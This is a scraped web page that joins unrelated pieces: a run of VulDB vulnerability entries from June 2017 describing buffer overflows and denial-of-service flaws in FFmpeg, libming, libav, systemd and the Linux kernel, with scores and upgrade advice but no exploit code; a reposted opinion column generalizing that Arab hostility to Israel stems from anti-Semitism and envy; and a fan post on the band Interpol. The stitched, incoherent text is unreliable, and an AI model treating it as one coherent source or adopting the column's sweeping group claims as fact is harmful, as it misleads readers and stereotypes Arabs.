Entries connected to this vulnerability are available at 102889, 102890, 102891 and 102892.

CVSSv3

VulDB Base Score: ≈5.5
VulDB Temp Score: ≈5.3
VulDB Vector: CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:X/RL:O/RC:X
VulDB Reliability: Low

CVSSv2

VulDB Base Score: ≈4.1 (CVSS2#AV:A/AC:M/Au:S/C:P/I:P/A:P)
VulDB Temp Score: ≈3.6 (CVSS2#E:ND/RL:OF/RC:ND)
VulDB Reliability: Low

CPE

Exploiting

Class: Buffer overflow / Heap-based (CWE-122)
Local: Yes
Remote: No

Availability: No

Price Prediction: steady
Current Price Estimation: $0-$5k (0-day) / $0-$5k (Today)

Countermeasures

Recommended: Upgrade
Status: Official fix
0-Day Time: 0 days since found

Upgrade: FFmpeg 3.3.2

Timeline

06/28/2017 Advisory disclosed
06/28/2017 VulDB entry created
06/28/2017 CVE assigned
06/28/2017 VulDB last update

Sources


CVE: CVE-2017-9995 (mitre.org) (nvd.nist.org) (cvedetails.com)
See also: 102889, 102890, 102891, 102892, 102894

Entry

Created: 06/28/2017
Entry: 68.4% complete

          FFmpeg up to 2.8.11/3.0.7/3.1.7/3.2.4/3.3.0 libavcodec/webp.c vp8_decode_mb_row_no_filter/pred8x8_128_dc_8_c buffer overflow   

A vulnerability has been found in FFmpeg up to 2.8.11/3.0.7/3.1.7/3.2.4/3.3.0 and classified as critical. This vulnerability affects the function vp8_decode_mb_row_no_filter/pred8x8_128_dc_8_c of the file libavcodec/webp.c. The manipulation with an unknown input leads to a buffer overflow vulnerability (heap-based). The CWE definition for the vulnerability is CWE-122. As an impact it is known to affect confidentiality, integrity, and availability.

The weakness was disclosed 06/28/2017. This vulnerability was named CVE-2017-9994 since 06/28/2017. There are known technical details, but no exploit is available. The current price for an exploit might be approx. USD $0-$5k (estimation calculated on 06/28/2017).

Upgrading to version 2.8.12, 3.0.8, 3.1.8, 3.2.5 or 3.3.1 eliminates this vulnerability.

Similar entries are available at 102888, 102889, 102890 and 102891.

CVSSv3

VulDB Base Score: ≈5.5
VulDB Temp Score: ≈5.3
VulDB Vector: CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:X/RL:O/RC:X
VulDB Reliability: Low

CVSSv2

VulDB Base Score: ≈4.1 (CVSS2#AV:A/AC:M/Au:S/C:P/I:P/A:P)
VulDB Temp Score: ≈3.6 (CVSS2#E:ND/RL:OF/RC:ND)
VulDB Reliability: Low

CPE

Exploiting

Class: Buffer overflow / Heap-based (CWE-122)
Local: Yes
Remote: No

Availability: No

Price Prediction: steady
Current Price Estimation: $0-$5k (0-day) / $0-$5k (Today)

Countermeasures

Recommended: Upgrade
Status: Official fix
0-Day Time: 0 days since found

Upgrade: FFmpeg 2.8.12/3.0.8/3.1.8/3.2.5/3.3.1

Timeline

06/28/2017 Advisory disclosed
06/28/2017 VulDB entry created
06/28/2017 CVE assigned
06/28/2017 VulDB last update

Sources


CVE: CVE-2017-9994 (mitre.org) (nvd.nist.org) (cvedetails.com)
See also: 102888, 102889, 102890, 102891, 102893, 102894

Entry

Created: 06/28/2017
Entry: 68.4% complete

          FFmpeg up to 2.8.11/3.0.7/3.1.7/3.2.4/3.3.0 HTTP Live Streaming Filename Extension Name information disclosure   

A vulnerability, which was classified as problematic, was found in FFmpeg up to 2.8.11/3.0.7/3.1.7/3.2.4/3.3.0. This affects an unknown function of the component HTTP Live Streaming Filename Extension Name. The manipulation with an unknown input leads to a information disclosure vulnerability. CWE is classifying the issue as CWE-200. This is going to have an impact on confidentiality.

The weakness was released 06/28/2017. This vulnerability is uniquely identified as CVE-2017-9993 since 06/28/2017. The technical details are unknown and an exploit is not publicly available.

Upgrading to version 2.8.12, 3.0.8, 3.1.8, 3.2.5 or 3.3.1 eliminates this vulnerability.

See 102888, 102889, 102890 and 102892 for similar entries.

CVSSv3

VulDB Base Score: ≈3.5
VulDB Temp Score: ≈3.4
VulDB Vector: CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:X
VulDB Reliability: Low

CVSSv2

VulDB Base Score: ≈1.5 (CVSS2#AV:A/AC:M/Au:S/C:P/I:N/A:N)
VulDB Temp Score: ≈1.3 (CVSS2#E:ND/RL:OF/RC:ND)
VulDB Reliability: Low

CPE

Exploiting

Class: Information disclosure (CWE-200)
Local: Yes
Remote: No

Availability: No

Price Prediction: steady
Current Price Estimation: $0-$5k (0-day) / $0-$5k (Today)

Countermeasures

Recommended: Upgrade
Status: Official fix
0-Day Time: 0 days since found

Upgrade: FFmpeg 2.8.12/3.0.8/3.1.8/3.2.5/3.3.1

Timeline

06/28/2017 Advisory disclosed
06/28/2017 VulDB entry created
06/28/2017 CVE assigned
06/28/2017 VulDB last update

Sources


CVE: CVE-2017-9993 (mitre.org) (nvd.nist.org) (cvedetails.com)
See also: 102888, 102889, 102890, 102892, 102893, 102894

Entry

Created: 06/28/2017
Entry: 68% complete

          FFmpeg up to 2.8.11/3.0.7/3.1.7/3.2.4/3.3.0 libavcodec/dfa.c decode_dds1 buffer overflow   

A vulnerability, which was classified as critical, has been found in FFmpeg up to 2.8.11/3.0.7/3.1.7/3.2.4/3.3.0. Affected by this issue is the function decode_dds1 of the file libavcodec/dfa.c. The manipulation with an unknown input leads to a buffer overflow vulnerability (heap-based). Using CWE to declare the problem leads to CWE-122. Impacted is confidentiality, integrity, and availability.

The weakness was published 06/28/2017. This vulnerability is handled as CVE-2017-9992 since 06/28/2017. Technical details are known, but there is no available exploit. The structure of the vulnerability defines a possible price range of USD $0-$5k at the moment (estimation calculated on 06/28/2017).

Upgrading to version 2.8.12, 3.0.8, 3.1.8, 3.2.5 or 3.3.1 eliminates this vulnerability.

The entries 102888, 102889, 102891 and 102892 are pretty similar.

CVSSv3

VulDB Base Score: ≈5.5
VulDB Temp Score: ≈5.3
VulDB Vector: CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:X/RL:O/RC:X
VulDB Reliability: Low

CVSSv2

VulDB Base Score: ≈4.1 (CVSS2#AV:A/AC:M/Au:S/C:P/I:P/A:P)
VulDB Temp Score: ≈3.6 (CVSS2#E:ND/RL:OF/RC:ND)
VulDB Reliability: Low

CPE

Exploiting

Class: Buffer overflow / Heap-based (CWE-122)
Local: Yes
Remote: No

Availability: No

Price Prediction: steady
Current Price Estimation: $0-$5k (0-day) / $0-$5k (Today)

Countermeasures

Recommended: Upgrade
Status: Official fix
0-Day Time: 0 days since found

Upgrade: FFmpeg 2.8.12/3.0.8/3.1.8/3.2.5/3.3.1

Timeline

06/28/2017 Advisory disclosed
06/28/2017 VulDB entry created
06/28/2017 CVE assigned
06/28/2017 VulDB last update

Sources


CVE: CVE-2017-9992 (mitre.org) (nvd.nist.org) (cvedetails.com)
See also: 102888, 102889, 102891, 102892, 102893, 102894

Entry

Created: 06/28/2017
Entry: 68.4% complete

          FFmpeg up to 2.8.11/3.0.7/3.1.7/3.2.4/3.3.0 libavcodec/xwddec.c xwd_decode_frame Application buffer overflow   

A vulnerability classified as critical was found in FFmpeg up to 2.8.11/3.0.7/3.1.7/3.2.4/3.3.0. Affected by this vulnerability is the function xwd_decode_frame of the file libavcodec/xwddec.c. The manipulation as part of a Application leads to a buffer overflow vulnerability (heap-based). The CWE definition for the vulnerability is CWE-122. As an impact it is known to affect confidentiality, integrity, and availability.

The weakness was shared 06/28/2017. This vulnerability is known as CVE-2017-9991 since 06/28/2017. Technical details are known, but no exploit is available. The price for an exploit might be around USD $0-$5k at the moment (estimation calculated on 06/28/2017).

Upgrading to version 2.8.12, 3.0.8, 3.1.8, 3.2.5 or 3.3.1 eliminates this vulnerability.

Entries connected to this vulnerability are available at 102888, 102890, 102891 and 102892.

CVSSv3

VulDB Base Score: ≈5.5
VulDB Temp Score: ≈5.3
VulDB Vector: CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:X/RL:O/RC:X
VulDB Reliability: Low

CVSSv2

VulDB Base Score: ≈4.1 (CVSS2#AV:A/AC:M/Au:S/C:P/I:P/A:P)
VulDB Temp Score: ≈3.6 (CVSS2#E:ND/RL:OF/RC:ND)
VulDB Reliability: Low

CPE

Exploiting

Class: Buffer overflow / Heap-based (CWE-122)
Local: Yes
Remote: No

Availability: No

Price Prediction: steady
Current Price Estimation: $0-$5k (0-day) / $0-$5k (Today)

Countermeasures

Recommended: Upgrade
Status: Official fix
0-Day Time: 0 days since found

Upgrade: FFmpeg 2.8.12/3.0.8/3.1.8/3.2.5/3.3.1

Timeline

06/28/2017 Advisory disclosed
06/28/2017 VulDB entry created
06/28/2017 CVE assigned
06/28/2017 VulDB last update

Sources


CVE: CVE-2017-9991 (mitre.org) (nvd.nist.org) (cvedetails.com)
See also: 102888, 102890, 102891, 102892, 102893

Entry

Created: 06/28/2017
Entry: 68.8% complete

          FFmpeg 3.3.0/3.3.1 libavcodec/xpmdec.c color_string_to_rgba buffer overflow   

A vulnerability classified as critical has been found in FFmpeg 3.3.0/3.3.1. Affected is the function color_string_to_rgba of the file libavcodec/xpmdec.c. The manipulation with an unknown input leads to a buffer overflow vulnerability (stack-based). CWE is classifying the issue as CWE-119. This is going to have an impact on confidentiality, integrity, and availability.

The weakness was presented 06/28/2017. This vulnerability is traded as CVE-2017-9990 since 06/28/2017. There are known technical details, but no exploit is available. The current price for an exploit might be approx. USD $0-$5k (estimation calculated on 06/28/2017).

Upgrading to version 3.3 eliminates this vulnerability.

Similar entries are available at 102889, 102890, 102891 and 102892.

CVSSv3

VulDB Base Score: ≈5.5
VulDB Temp Score: ≈5.3
VulDB Vector: CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:X/RL:O/RC:X
VulDB Reliability: Low

CVSSv2

VulDB Base Score: ≈4.1 (CVSS2#AV:A/AC:M/Au:S/C:P/I:P/A:P)
VulDB Temp Score: ≈3.6 (CVSS2#E:ND/RL:OF/RC:ND)
VulDB Reliability: Low

CPE

Exploiting

Class: Buffer overflow / Stack-based (CWE-119)
Local: Yes
Remote: No

Availability: No

Price Prediction: steady
Current Price Estimation: $0-$5k (0-day) / $0-$5k (Today)

Countermeasures

Recommended: Upgrade
Status: Official fix
0-Day Time: 0 days since found

Upgrade: FFmpeg 3.3

Timeline

06/28/2017 Advisory disclosed
06/28/2017 VulDB entry created
06/28/2017 CVE assigned
06/28/2017 VulDB last update

Sources


CVE: CVE-2017-9990 (mitre.org) (nvd.nist.org) (cvedetails.com)
See also: 102889, 102890, 102891, 102892

Entry

Created: 06/28/2017
Entry: 68.4% complete

          libming 0.4.8 util/outputtxt.c denial of service   

A vulnerability was found in libming 0.4.8. It has been rated as problematic. This issue affects an unknown function of the file util/outputtxt.c. The manipulation with an unknown input leads to a denial of service vulnerability (null pointer dereference). Using CWE to declare the problem leads to CWE-476. Impacted is availability. The summary by CVE is:

util/outputtxt.c in libming 0.4.8 mishandles memory allocation. A crafted input will lead to a remote denial of service (NULL pointer dereference) attack.

The weakness was disclosed 06/28/2017. The identification of this vulnerability is CVE-2017-9989 since 06/27/2017. Technical details of the vulnerability are known, but there is no available exploit. The pricing for an exploit might be around USD $0-$5k at the moment (estimation calculated on 06/28/2017).

There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.

See 102886 for similar entries.

CVSSv3

VulDB Base Score: ≈3.5
VulDB Temp Score: ≈3.5
VulDB Vector: CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L/E:X/RL:X/RC:X
VulDB Reliability: Low

CVSSv2

VulDB Base Score: ≈1.5 (CVSS2#AV:A/AC:M/Au:S/C:N/I:N/A:P)
VulDB Temp Score: ≈1.5 (CVSS2#E:ND/RL:ND/RC:ND)
VulDB Reliability: Low

CPE

Exploiting

Class: Denial of service / NULL Pointer Dereference (CWE-476)
Local: Yes
Remote: No

Availability: No

Price Prediction: steady
Current Price Estimation: $0-$5k (0-day) / $0-$5k (Today)

Countermeasures

Recommended: no mitigation known
0-Day Time: 0 days since found

Timeline

06/27/2017 CVE assigned
06/28/2017 Advisory disclosed
06/28/2017 VulDB entry created
06/28/2017 VulDB last update

Sources


CVE: CVE-2017-9989 (mitre.org) (nvd.nist.org) (cvedetails.com)
See also: 102886

Entry

Created: 06/28/2017
Entry: 66.4% complete

          libming 0.4.8 util/read.c readEncUInt30 denial of service   

A vulnerability was found in libming 0.4.8. It has been declared as problematic. This vulnerability affects the function readEncUInt30 of the file util/read.c. The manipulation with an unknown input leads to a denial of service vulnerability (null pointer dereference). The CWE definition for the vulnerability is CWE-476. As an impact it is known to affect availability. CVE summarizes:

The readEncUInt30 function in util/read.c in libming 0.4.8 mishandles memory allocation. A crafted input will lead to a remote denial of service (NULL pointer dereference) attack against parser.c.

The weakness was released 06/28/2017. This vulnerability was named CVE-2017-9988 since 06/27/2017. Technical details are known, but there is no available exploit. The structure of the vulnerability defines a possible price range of USD $0-$5k at the moment (estimation calculated on 06/28/2017).

There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.

The entries 102887 are pretty similar.

CVSSv3

VulDB Base Score: ≈3.5
VulDB Temp Score: ≈3.5
VulDB Vector: CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L/E:X/RL:X/RC:X
VulDB Reliability: Low

CVSSv2

VulDB Base Score: ≈1.5 (CVSS2#AV:A/AC:M/Au:S/C:N/I:N/A:P)
VulDB Temp Score: ≈1.5 (CVSS2#E:ND/RL:ND/RC:ND)
VulDB Reliability: Low

CPE

Exploiting

Class: Denial of service / NULL Pointer Dereference (CWE-476)
Local: Yes
Remote: No

Availability: No

Price Prediction: steady
Current Price Estimation: $0-$5k (0-day) / $0-$5k (Today)

Countermeasures

Recommended: no mitigation known
0-Day Time: 0 days since found

Timeline

06/27/2017 CVE assigned
06/28/2017 Advisory disclosed
06/28/2017 VulDB entry created
06/28/2017 VulDB last update

Sources


CVE: CVE-2017-9988 (mitre.org) (nvd.nist.org) (cvedetails.com)
See also: 102887

Entry

Created: 06/28/2017
Entry: 66.8% complete

          libav 12.1 mpegvideo_motion.c hpel_motion denial of service   

A vulnerability was found in libav 12.1. It has been classified as problematic. This affects the function hpel_motion of the file mpegvideo_motion.c. The manipulation with an unknown input leads to a denial of service vulnerability (heap-based). CWE is classifying the issue as CWE-122. This is going to have an impact on availability.

The weakness was published 06/28/2017. This vulnerability is uniquely identified as CVE-2017-9987 since 06/27/2017. It is possible to initiate the attack remotely. Technical details are known, but no exploit is available. The price for an exploit might be around USD $0-$5k at the moment (estimation calculated on 06/28/2017).

There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.

CVSSv3

VulDB Base Score: ≈4.3
VulDB Temp Score: ≈4.3
VulDB Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L/E:X/RL:X/RC:X
VulDB Reliability: Medium

CVSSv2

VulDB Base Score: ≈3.5 (CVSS2#AV:N/AC:M/Au:S/C:N/I:N/A:P)
VulDB Temp Score: ≈3.5 (CVSS2#E:ND/RL:ND/RC:ND)
VulDB Reliability: Medium

CPE

Exploiting

Class: Denial of service / Heap-based (CWE-122)
Local: No
Remote: Yes

Availability: No

Price Prediction: steady
Current Price Estimation: $0-$5k (0-day) / $0-$5k (Today)

Countermeasures

Recommended: no mitigation known
0-Day Time: 0 days since found

Timeline

06/27/2017 CVE assigned
06/28/2017 Advisory disclosed
06/28/2017 VulDB entry created
06/28/2017 VulDB last update

Sources


CVE: CVE-2017-9987 (mitre.org) (nvd.nist.org) (cvedetails.com)

Entry

Created: 06/28/2017
Entry: 68.8% complete

          systemd up to 223 DNS Response dns_packet_new TCP Packet buffer overflow   

A vulnerability, which was classified as critical, has been found in systemd up to 223. This issue affects the function dns_packet_new of the component DNS Response Handler. The manipulation as part of a TCP Packet leads to a buffer overflow vulnerability. Using CWE to declare the problem leads to CWE-119. Impacted is confidentiality, integrity, and availability.

The weakness was released 06/28/2017 (oss-sec). The advisory is shared for download at openwall.com. The identification of this vulnerability is CVE-2017-9445 since 06/05/2017. The attack may be initiated remotely. No form of authentication is needed for a successful exploitation. Technical details are known, but no exploit is available. The price for an exploit might be around USD $0-$5k at the moment (estimation calculated on 06/28/2017).

There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.

CVSSv3

VulDB Base Score: 6.3
VulDB Temp Score: 6.3
VulDB Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L/E:X/RL:X/RC:X
VulDB Reliability: High

CVSSv2

VulDB Base Score: 6.8 (CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P)
VulDB Temp Score: 6.8 (CVSS2#E:ND/RL:ND/RC:ND)
VulDB Reliability: High

CPE

Exploiting

Class: Buffer overflow (CWE-119)
Local: No
Remote: Yes

Availability: No

Price Prediction: steady
Current Price Estimation: $0-$5k (0-day) / $0-$5k (Today)

Countermeasures

Recommended: no mitigation known
0-Day Time: 0 days since found

Timeline

06/05/2017 CVE assigned
06/28/2017 Advisory disclosed
06/28/2017 VulDB entry created
06/28/2017 VulDB last update

Sources

Advisory: openwall.com

CVE: CVE-2017-9445 (mitre.org) (nvd.nist.org) (cvedetails.com)

Entry

Created: 06/28/2017
Entry: 71.2% complete

          Linux Kernel up to 4.11.7 Message Queue msnd_pinnacle.c snd_msnd_interrupt buffer overflow   

A vulnerability, which was classified as critical, was found in Linux Kernel up to 4.11.7. Affected is the function snd_msnd_interrupt of the file sound/isa/msnd/msnd_pinnacle.c of the component Message Queue. The manipulation with an unknown input leads to a buffer overflow vulnerability. CWE is classifying the issue as CWE-119. This is going to have an impact on confidentiality, integrity, and availability.

The weakness was disclosed 06/28/2017. This vulnerability is traded as CVE-2017-9984 since 06/27/2017. Local access is required to approach this attack. A single authentication is required for exploitation. Technical details are known, but there is no available exploit. The structure of the vulnerability defines a possible price range of USD $5k-$25k at the moment (estimation calculated on 06/28/2017).

There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.

The entries 102883 and 102884 are pretty similar.

CVSSv3

VulDB Base Score: 5.3
VulDB Temp Score: 5.3
VulDB Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:X/RL:X/RC:X
VulDB Reliability: High

CVSSv2

VulDB Base Score: 4.1 (CVSS2#AV:L/AC:M/Au:S/C:P/I:P/A:P)
VulDB Temp Score: 4.1 (CVSS2#E:ND/RL:ND/RC:ND)
VulDB Reliability: High

CPE

Exploiting

Class: Buffer overflow (CWE-119)
Local: Yes
Remote: No

Availability: No

Price Prediction: steady
Current Price Estimation: $0-$5k (0-day) / $0-$5k (Today)

Countermeasures

Recommended: no mitigation known
0-Day Time: 0 days since found

Timeline

06/27/2017 CVE assigned
06/28/2017 Advisory disclosed
06/28/2017 VulDB entry created
06/28/2017 VulDB last update

Sources


CVE: CVE-2017-9984 (mitre.org) (nvd.nist.org) (cvedetails.com)
See also: 102883, 102884

Entry

Created: 06/28/2017
Entry: 72% complete

          Linux Kernel up to 4.11.7 Message Queue msnd_pinnacle.c intr buffer overflow   

A vulnerability was found in Linux Kernel up to 4.11.7 and classified as critical. Affected by this issue is the function intr of the file sound/oss/msnd_pinnacle.c of the component Message Queue. The manipulation with an unknown input leads to a buffer overflow vulnerability. Using CWE to declare the problem leads to CWE-119. Impacted is confidentiality, integrity, and availability.

The weakness was shared 06/28/2017. This vulnerability is handled as CVE-2017-9986 since 06/27/2017. The attack needs to be approached locally. A single authentication is needed for exploitation. There are known technical details, but no exploit is available. The current price for an exploit might be approx. USD $5k-$25k (estimation calculated on 06/28/2017).

There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.

Similar entries are available at 102882 and 102883.

CVSSv3

VulDB Base Score: 5.3
VulDB Temp Score: 5.3
VulDB Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:X/RL:X/RC:X
VulDB Reliability: High

CVSSv2

VulDB Base Score: 4.1 (CVSS2#AV:L/AC:M/Au:S/C:P/I:P/A:P)
VulDB Temp Score: 4.1 (CVSS2#E:ND/RL:ND/RC:ND)
VulDB Reliability: High

CPE

Exploiting

Class: Buffer overflow (CWE-119)
Local: Yes
Remote: No

Availability: No

Price Prediction: steady
Current Price Estimation: $0-$5k (0-day) / $0-$5k (Today)

Countermeasures

Recommended: no mitigation known
0-Day Time: 0 days since found

Timeline

06/27/2017 CVE assigned
06/28/2017 Advisory disclosed
06/28/2017 VulDB entry created
06/28/2017 VulDB last update

Sources


CVE: CVE-2017-9986 (mitre.org) (nvd.nist.org) (cvedetails.com)
See also: 102882, 102883

Entry

Created: 06/28/2017
Entry: 72% complete

          Linux Kernel up to 4.11.7 Message Queue msnd_midi.c snd_msndmidi_input_read buffer overflow   

A vulnerability has been found in Linux Kernel up to 4.11.7 and classified as critical. Affected by this vulnerability is the function snd_msndmidi_input_read of the file sound/isa/msnd/msnd_midi.c of the component Message Queue. The manipulation with an unknown input leads to a buffer overflow vulnerability. The CWE definition for the vulnerability is CWE-119. As an impact it is known to affect confidentiality, integrity, and availability.

The weakness was presented 06/28/2017. This vulnerability is known as CVE-2017-9985 since 06/27/2017. Attacking locally is a requirement. A single authentication is necessary for exploitation. Technical details of the vulnerability are known, but there is no available exploit. The pricing for an exploit might be around USD $5k-$25k at the moment (estimation calculated on 06/28/2017).

There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.

See 102882 and 102884 for similar entries.

CVSSv3

VulDB Base Score: 5.3
VulDB Temp Score: 5.3
VulDB Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:X/RL:X/RC:X
VulDB Reliability: High

CVSSv2

VulDB Base Score: 4.1 (CVSS2#AV:L/AC:M/Au:S/C:P/I:P/A:P)
VulDB Temp Score: 4.1 (CVSS2#E:ND/RL:ND/RC:ND)
VulDB Reliability: High

CPE

Exploiting

Class: Buffer overflow (CWE-119)
Local: Yes
Remote: No

Availability: No

Price Prediction: steady
Current Price Estimation: $0-$5k (0-day) / $0-$5k (Today)

Countermeasures

Recommended: no mitigation known
0-Day Time: 0 days since found

Timeline

06/27/2017 CVE assigned
06/28/2017 Advisory disclosed
06/28/2017 VulDB entry created
06/28/2017 VulDB last update

Sources


CVE: CVE-2017-9985 (mitre.org) (nvd.nist.org) (cvedetails.com)
See also: 102882, 102884

Entry

Created: 06/28/2017
Entry: 72% complete

          By: mk   
Arab Like Me By Lee Habeeb February 15, 2012 4:00 A.M. There are two kinds of Arabs in this world. Those who hate Jews, and those who don’t. And in my life, I have met more of the former than the latter. I am not proud to say that. Arabs will not like me for admitting it. But it is true. And it is something I wish the Obama administration understood. It is something Americans should know as the “Arab Spring” enters its second year. I didn’t know much about any of this as a Lebanese kid growing up in New Jersey. But I found out about it when I wrote my first pro-Israel column for my college paper as a young student journalist. I defended Israel on some point I’ve long forgotten, but what I’ll never forget is the backlash I received from fellow Arabs. Some were Americans, others were students from Arab countries, many of whom I counted as friends. First came the letters to the editor, then the personal insults. It was as if I’d broken a secret code I didn’t know existed. Some secret blood oath, which goes something like this: Arabs don’t speak unkindly of Arabs in public, or kindly about Israel. The backlash stunned me. I pondered the pounding I had taken, and floundered a bit. I even thought for a short time of writing something negative about Israel the next time I had a chance, just to balance things out and reestablish my Arab bona fides. One friend accused me of being a self-hating Arab. He explained to me that I was exploiting my ancestry to ingratiate myself with white America and the Jews who controlled white America. I explained to him that I was white. And that I was an American. And that I didn’t believe that Jews controlled America. The Jewish men I knew had a hard enough time controlling their own families! But nothing I said helped relieve the tension, not even my stab at humor. I also explained that many of my Jewish friends did not like my column. Most were liberals from New York or northern New Jersey who assumed I was with them on the politics of the Middle East, that I was in agreement with the governing thesis that drives most Arabs and liberal Jews: that it is Israel that is the problem in the region, not the Palestinians, and not the Arab world itself. I also explained to him that I was mostly Lebanese, but also part German and part Italian, and that I was raised by parents who didn’t much care for the whole notion of hyphenated America. They taught me to think for myself, and have the courage to challenge authority. Even theirs, if I could make the case. The fact is, Arabs don’t all look alike or think alike. But we are often pushed into a kind of groupthink, a kind of self-censorship that hinders our development and our understanding of ourselves and the world around us. We are not a universal group. But some of us believe in a simple universal truth: that every Arab deserves to live in freedom, wherever he or she might call home. Some of us want Arab countries to be more like America and Israel, places where the individual can flourish. Say those words to many Arabs and they are shocked and angered. Soon, words like imperialist are thrown about, and the subject turns to Israel. Always, it seems, it turns to Israel. Why the anger when I hint that America and Israel might have something to teach the Arab world? I thought about it for the longest time, and only recently stumbled upon the answer. It is all about Arab self-doubt. It is all tied to a profound lack of cultural self-confidence, and a deep-seated fear that maybe, just maybe, Arabs won’t be very good at the self-governance thing. That Arab nations won’t be capable of building democratic cultures that engender the flourishing of human freedom, and that these nations won’t have the ability to tap the God-given talents of their people the way Americans and Israelis do. That maybe, just maybe, the Arab world will never measure up to America or Israel. Better, goes the logic, to cling to anger over the plight of the Palestinians. Better to cling to international policy disputes and to a deep-seated hatred of Israel. Better to play the role of victim, and the role of self-righteous critic, than to do the hard work of lifting up the conditions of your people. An Arab American friend of mine who works for a large NGO is a case in point. He is Jordanian, he’s well educated, and he speaks five languages. But mention the word Israel, and watch his blood boil immediately. He will go into a lengthy diatribe about the injustices perpetrated against the Palestinians by Israel. When Prime Minister Netanyahu’s name is mentioned, I worry that he will have a seizure on the spot. Why is this? Why is all of his passion, all of his anger and rage, directed at this one country, this one people? Why is it not directed at Syria, I ask him? By all accounts, the Syrian government orchestrated the assassination of one of the Arab world’s great men of peace, former Lebanese prime minister Rafic Hariri. And President Assad continues to terrorize his own people. Why not at Hezbollah, which orchestrated the takeover of Lebanon? Why not at Hosni Mubarak when he was in power? Or Saddam Hussein? Why not at the ways in which Islam degrades women in the Middle East, trapping them in a life of servitude? Why not at the ways some Muslims are persecuting Christians throughout the Middle East, as reports pour in about atrocities upon atrocities? Why not a critique of the Koran itself, which regrettably finds little separation between mosque and state, thus relegating the majority of Arabs to life under theocratic regimes? Two reasons: fear, and envy. To the dismay of Arabs around the world, Jewish people turned an ancient piece of real estate in the Middle East into a thriving oasis of intellectual, political, religious, and commercial activity, where people are free to do as they please. One of the oldest places on earth — a place where Abraham walked — Israel is as thoroughly modern as any place on earth, with a functioning government that respects religious and economic freedom. A young person in Israel can choose to work in some of the best high-tech companies in the world, or can pursue a life dedicated to Talmudic studies. A woman has an equal right to pursue any career she likes, and people of different sexual orientations are not driven underground — or worse. The fact is, the God-given talents of the people of Israel are allowed to flourish in ways Arabs should want to emulate, and replicate. This smart, dynamic Jordanian friend instead focuses on border disputes and the acts of the Israeli government. He performs Houdini-like intellectual twists to dodge my questions, which are always gentle, but cut right through to his very clear — and almost programmed — bigotry. I ask him why he is obsessed with the 1967 border dispute, and not some other border grudge, as it would not take long to find other countries unhappy with the ways in which territories were allocated as spoils of various 19th- and 20th-century wars. I tell him that using his logic, Mexican terrorists should be blowing themselves up in Houston and El Paso. And they should have his unwavering support to compel America to return Texas to its rightful, original owner. I now ask Arabs who show such a knee-jerk reaction to Israel a simple question, one that cuts to the heart of all this nonsense: Why do you hate Jews? They first get angry, but then quickly point out that they have no beef with Jews. It’s Israel they hate. To which I reply, “If Israel had been handed over to Bolivians or Albanians or Estonians, would you still hate it?” It is a none-too-subtle question, but it makes the point: Despising Israel the way Israel is despised in much of the Arab world is all about anti-Semitism. And most anti-Semitism anywhere in the world has its origins in envy. Benjamin Netanyahu once gave a speech in which he pointed at a map of the Middle East. He rattled off many of the countries in the region, and the relative size of those nations to Israel. Jordan is four times the size of Israel, Iraq 20, Egypt 46; Saudi Arabia is nearly 90 times the size of Israel. “Big countries,” he said. “But small accomplishments.” He then went on to describe Israel, which is just slightly bigger than one of America’s smallest states, New Jersey. “Little country,” he concluded. “But big accomplishments.” And there you have it, in one perfectly formulated binary. Today, Arabs are at a crossroads. The “Arab Spring” is an opportunity like none the region has ever seen. The people who live there are no more or less capable than the people of Israel or the United States. But it is up to them to build functioning democracies, and a culture that breeds and rewards hard work and success. It is up to Arabs themselves to take advantage of their newfound freedom, and unleash the productive capacities of their people. Countries aren’t built on spite and hate, but on love, trust, shared sacrifice, and hard work. Maybe, just maybe, Arabs in the Middle East will be so busy working, yearning, and striving to make their own lives better that they will have little time left to burnish old grievances. Maybe, over time, Arabs will build governments worthy of their people, as Israel and America have done. Maybe, Arabs will come to see Jews not as their enemies, but as their neighbors, and as their trading partners. And maybe, just maybe, as their friends. Here is one Arab praying that will happen. http://www.nationalreview.com/articles/291094/arab-me-lee-habeeb
          Carlos: In Defense of Artistic Integrity   
Something I love about Interpol is each member’s commitment to artistic integrity and the different ways they express it. In a recent interview (see July 6 entry), Sam stated that his is a commitment to the integrity of Interpol’s ability to reach the audience on a raw emotional level. Daniel often talks about the organic way in which Interpol write their songs and how the integrity of that process is never compromised, while Paul has consistently insisted that his lyrics are not necessarily autobiographical nor are their meanings necessarily fixed; that what’s important is the listener’s unique way of responding to the words. He has always defended the integrity of his intentional indirectness when writing the lyrics for Interpol’s songs.

Carlos also has his own take on artistic integrity, as expressed in this interview from Straight.com. Here we see Carlos dismiss the negative critical attention to Our Love to Admire. The qualifications contained in such attention, he asserts, are not pertinent to Interpol’s purpose, which is to work “from a place that is based on love and artistic integrity.” When this purpose is the focus of the song-writing process, questions of worth “become so shallow and so hollow.” For Carlos, it’s all about an honest portrayal of his artistic self.

